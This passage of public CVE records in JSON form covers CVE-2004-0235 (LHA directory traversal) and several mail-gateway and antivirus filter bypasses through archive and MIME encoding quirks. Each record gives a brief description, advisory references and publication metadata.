                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\")."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "CLA-2004:840",
              "refsource": "CONECTIVA",
              "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
            },
            {
              "name": "FEDORA-2004-119",
              "refsource": "FEDORA",
              "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
            },
            {
              "name": "10243",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/10243"
            },
            {
              "name": "20040501 LHa buffer overflows and directory traversal problems",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
            },
            {
              "name": "lha-directory-traversal(16013)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
            },
            {
              "name": "RHSA-2004:179",
              "refsource": "REDHAT",
              "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
            },
            {
              "name": "FLSA:1833",
              "refsource": "FEDORA",
              "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
            },
            {
              "name": "DSA-515",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2004/dsa-515"
            },
            {
              "name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
            },
            {
              "name": "GLSA-200405-02",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
            },
            {
              "name": "RHSA-2004:178",
              "refsource": "REDHAT",
              "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
            },
            {
              "name": "oval:org.mitre.oval:def:978",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
            },
            {
              "name": "oval:org.mitre.oval:def:10409",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0235",
    "datePublished": "2004-05-05T04:00:00",
    "dateReserved": "2004-03-17T00:00:00",
    "dateUpdated": "2024-08-08T00:10:03.724Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-1154
Vulnerability from cvelistv5
Published
2005-05-10 04:00
Modified
2024-08-08 02:19
Severity ?
Summary
MAILsweeper for SMTP 4.3 allows remote attackers to bypass virus protection via a mail message with a malformed zip attachment, as exploited by certain MIMAIL virus variants.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:19:45.811Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "8982",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/8982"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.computerworld.co.nz/cw.nsf/0/BF9E8E6E2D313E5FCC256DD70016473F?OpenDocument\u0026More="
          },
          {
            "name": "mailsweeper-zip-virus-bypass(13611)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/13611"
          },
          {
            "name": "10148",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/10148"
          },
          {
            "name": "2772",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/2772"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2003-11-05T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "MAILsweeper for SMTP 4.3 allows remote attackers to bypass virus protection via a mail message with a malformed zip attachment, as exploited by certain MIMAIL virus variants."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "8982",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/8982"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.computerworld.co.nz/cw.nsf/0/BF9E8E6E2D313E5FCC256DD70016473F?OpenDocument\u0026More="
        },
        {
          "name": "mailsweeper-zip-virus-bypass(13611)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/13611"
        },
        {
          "name": "10148",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/10148"
        },
        {
          "name": "2772",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/2772"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-1154",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "MAILsweeper for SMTP 4.3 allows remote attackers to bypass virus protection via a mail message with a malformed zip attachment, as exploited by certain MIMAIL virus variants."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "8982",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/8982"
            },
            {
              "name": "http://www.computerworld.co.nz/cw.nsf/0/BF9E8E6E2D313E5FCC256DD70016473F?OpenDocument\u0026More=",
              "refsource": "MISC",
              "url": "http://www.computerworld.co.nz/cw.nsf/0/BF9E8E6E2D313E5FCC256DD70016473F?OpenDocument\u0026More="
            },
            {
              "name": "mailsweeper-zip-virus-bypass(13611)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/13611"
            },
            {
              "name": "10148",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/10148"
            },
            {
              "name": "2772",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/2772"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-1154",
    "datePublished": "2005-05-10T04:00:00",
    "dateReserved": "2005-05-04T00:00:00",
    "dateUpdated": "2024-08-08T02:19:45.811Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-1015
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 02:12
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use whitespace in an unusual fashion, which may be interpreted differently by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:12:35.561Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field whitespace issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109525252118936\u0026w=2"
          },
          {
            "name": "mime-tools-incorrect-concatenation(9273)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9273"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use whitespace in an unusual fashion, which may be interpreted differently by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field whitespace issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109525252118936\u0026w=2"
        },
        {
          "name": "mime-tools-incorrect-concatenation(9273)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9273"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-1015",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use whitespace in an unusual fashion, which may be interpreted differently by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field whitespace issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109525252118936\u0026w=2"
            },
            {
              "name": "mime-tools-incorrect-concatenation(9273)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9273"
            },
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-1015",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2003-12-17T00:00:00",
    "dateUpdated": "2024-08-08T02:12:35.561Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-0161
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 00:10
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use RFC2231 encoding, which may be interpreted differently by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:10:03.382Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC2231 encoding issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109524928232568\u0026w=2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          },
          {
            "name": "mime-tools-parameter-encoding(9274)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9274"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use RFC2231 encoding, which may be interpreted differently by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC2231 encoding issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109524928232568\u0026w=2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        },
        {
          "name": "mime-tools-parameter-encoding(9274)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9274"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0161",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use RFC2231 encoding, which may be interpreted differently by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC2231 encoding issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109524928232568\u0026w=2"
            },
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            },
            {
              "name": "mime-tools-parameter-encoding(9274)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9274"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0161",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2004-02-18T00:00:00",
    "dateUpdated": "2024-08-08T00:10:03.382Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-0929
Vulnerability from cvelistv5
Published
2004-08-18 04:00
Modified
2024-08-08 02:12
Severity ?
Summary
Clearswift MAILsweeper before 4.3.15 does not properly detect and filter ZIP 6.0 encoded files, which allows remote attackers to bypass intended policy.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:12:34.360Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.corsaire.com/advisories/c030807-001.txt"
          },
          {
            "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-08-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect and filter ZIP 6.0 encoded files, which allows remote attackers to bypass intended policy."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.corsaire.com/advisories/c030807-001.txt"
        },
        {
          "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-0929",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect and filter ZIP 6.0 encoded files, which allows remote attackers to bypass intended policy."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.corsaire.com/advisories/c030807-001.txt",
              "refsource": "MISC",
              "url": "http://www.corsaire.com/advisories/c030807-001.txt"
            },
            {
              "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-0929",
    "datePublished": "2004-08-18T04:00:00",
    "dateReserved": "2003-11-05T00:00:00",
    "dateUpdated": "2024-08-08T02:12:34.360Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-0928
Vulnerability from cvelistv5
Published
2004-08-18 04:00
Modified
2024-08-08 02:12
Severity ?
Summary
Clearswift MAILsweeper before 4.3.15 does not properly detect and filter RAR 3.20 encoded files, which allows remote attackers to bypass intended policy.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:12:34.298Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.corsaire.com/advisories/c030807-001.txt"
          },
          {
            "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-08-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect and filter RAR 3.20 encoded files, which allows remote attackers to bypass intended policy."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.corsaire.com/advisories/c030807-001.txt"
        },
        {
          "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-0928",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect and filter RAR 3.20 encoded files, which allows remote attackers to bypass intended policy."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.corsaire.com/advisories/c030807-001.txt",
              "refsource": "MISC",
              "url": "http://www.corsaire.com/advisories/c030807-001.txt"
            },
            {
              "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-0928",
    "datePublished": "2004-08-18T04:00:00",
    "dateReserved": "2003-11-05T00:00:00",
    "dateUpdated": "2024-08-08T02:12:34.298Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-0162
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 00:10
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME encapsulation that uses RFC822 comment fields, which may be interpreted as other fields by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:10:03.544Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC822 comment issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109517563513776\u0026w=2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          },
          {
            "name": "mime-rfc822-filtering-bypass(17332)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17332"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME encapsulation that uses RFC822 comment fields, which may be interpreted as other fields by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC822 comment issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109517563513776\u0026w=2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        },
        {
          "name": "mime-rfc822-filtering-bypass(17332)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17332"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0162",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME encapsulation that uses RFC822 comment fields, which may be interpreted as other fields by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC822 comment issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109517563513776\u0026w=2"
            },
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            },
            {
              "name": "mime-rfc822-filtering-bypass(17332)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17332"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0162",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2004-02-18T00:00:00",
    "dateUpdated": "2024-08-08T00:10:03.544Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-0051
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 00:01
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard but frequently supported Content-Transfer-Encoding values such as (1) uuencode, (2) mac-binhex40, and (3) yenc, which may be interpreted differently by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:01:23.610Z",
